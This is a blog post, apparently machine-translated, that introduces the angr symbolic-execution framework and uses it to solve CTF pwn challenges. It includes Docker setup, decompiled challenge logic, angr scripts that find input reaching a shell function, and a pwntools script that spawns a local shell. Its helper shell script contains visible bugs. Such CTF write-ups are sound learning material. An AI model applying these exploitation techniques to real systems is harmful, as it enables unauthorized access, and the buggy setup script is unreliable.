zer0_1s

zer0_1s

探索不止
HomeArchives

auto pwn

#pwn#漏洞挖掘108
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The text discusses the angr python framework, which is used for analyzing binaries. It explains how to install and use angr in a docker environment. It also provides an example of using angr to automate the exploitation of a PWN challenge. The text mentions the author's gratitude to D0g3 for providing a corresponding challenge and explains the logic behind the challenge. It then presents a code snippet using angr to jump to a shell function. The text also includes a code snippet using the pwn library to solve the challenge and another code snippet using angr to find the flag in a different challenge. The author mentions that although they will no longer focus on CTF binary challenges, they may still be interested in related topics in the future.

Actually, I saw an example of binary mining for auto pwn introduced by Master i0gan from D0g3 Lab, and I really want to see what it is all about.

1. angr python framework#

What is angr?
angr is a python framework for analyzing binaries. It combines both static and dynamic symbolic ("concolic") analysis, making it applicable to a variety of tasks.

It is brought to you by the Computer Security Lab at UC Santa Barbara, SEFCOM at Arizona State University, their associated CTF team, Shellphish, the open source community, and @rhelmot.

concolic is a combination of the words "concrete" and "symbolic". Concolic testing is a hybrid software verification technique that uses both symbolic execution (treating program variables as symbolic variables) and concrete execution (involving concrete inputs).

2. angr environment deployment#

install docker

curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun

docker pull

docker pull angr/angr

./setup.sh -i -e angr

# how to use angr in docker 
docker run -itd --name angr angr/angr
docker exec -it angr bash
su angr # root users do not have the angr environment, so switch to the angr user

#! /bin/sh
# Author: i0gan
# for starting docker angr
pwd=`pwd`
if [[ $1 < 2 ]];then
    echo "Usage angr script.py"
		exit
fi
script = $1
docker run -it \
					  -u angr \
						--rm \
						-v $(pwd)/${ctf_name}:/ctf/work \
						-w /ctf/work angr/angr "/home/angr/.virtualenvs/angr/bin/python" "/ctf/work/$script" $2 $3

docker run -it \
	--rm \
	-v $(pwd)/${ctf_name}:/ctf/work \ 
	-p 23946:23946  \	
	--privileged  \
	--cap-add=SYS_PTRACE \
  	--security-opt seccomp=unconfined \
	pwndocker

3. Introduction to angr#

Learning angr (Part 1)

4. Automated Mining Example for PWN Questions#

AUTO PWN|34th Issue

Thanks to Master D0g3 from Chengxin for providing the corresponding question quickly;

root@DESKTOP-4VN4G0C:/Desktop/pwn# checksec pwn1
[*] '/Desktop/pwn/pwn1'
    Arch:     i386-32-little
   RELRO:    Partial RELRO
   Stack:    No canary found
      NX:       NX disabled
     PIE:      No PIE (0x8048000)

Next, analyze the corresponding logic of the disassembled code in IDA:

image

int sub_804870E()
{
  int result; // eax
  char v1; // [esp+Ch] [ebp-1Ch]
  int v2; // [esp+1Ch] [ebp-Ch]

  result = atoi(&input); // '\n' defaults to case 0, and there are also cases 1, 2, and other branches
  v2 = result;
  switch ( result )
  {
    case 1:
      puts("logging out...");
      result = ~dword_804A06C;
      dword_804A06C = ~dword_804A06C;
      break;
    case 2:
      if ( dword_804A06C )
        result = sub_80486F5(); // bounce shell
      else
        result = puts("please log in");
      break;
    case 0:
      puts("input your passwd:");
      result = sub_804859B((int)&v1, 16); // theoretically, it is for entering the password, but without a match, it is impossible to know how many characters the password is
      dword_804A06C = 1; // key variable for bouncing shell
      break;
  }
  return result;
}

Master D0g3's method is to use the angr framework to achieve the goal of jumping to the shell function, as long as it can jump to the red one.

image

target_addr = 0x08048783

import angr
from binascii import b2a_hex
import logging
import sys
#logging.getLogger('angr').setLevel('INFO')
logging.getLogger('angr').setLevel('CRITICAL')

def angr_main():
    pj = angr.Project('./pwn1')
    state = pj.factory.entry_state()
    simgr = pj.factory.simgr(state)
    simgr.explore(find = 0x08048783) # call shell
    p = simgr.found[0].posix.dumps(0)
    print(b2a_hex(p).decode(), end='')
angr_main()


root@DESKTOP-4VN4G0C:/Desktop/pwn# docker cp /Desktop/pwn/pwn1 1e40bd134aa7:/home
root@DESKTOP-4VN4G0C:/Desktop/pwn# docker cp /Desktop/pwn/script.py 1e40bd134aa7:/home

image


from pwn import *
import os
from binascii import a2b_hex

io = process('./pwn1')
print('Solving...')
payload = a2b_hex('310a320a')
io.send(payload)
print('Get shell')
io.sendline(b'whoami')
io.interactive()

image

import angr
from binascii import b2a_hex
import logging
import sys
#logging.getLogger('angr').setLevel('INFO')
logging.getLogger('angr').setLevel('CRITICAL')

def angr_main():
    pj = angr.Project('./find_flag')
    state = pj.factory.entry_state()
    simgr = pj.factory.simgr(state)
    simgr.explore(find = 0x1229) # call shell
    p = simgr.found[0].posix.dumps(0)
    print(b2a_hex(p).decode(), end='')
angr_main()

This article is a test for the xLog platform. Although I will no longer focus on CTF binary direction in the future, I may still pay attention to interesting topics or issues in this field.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.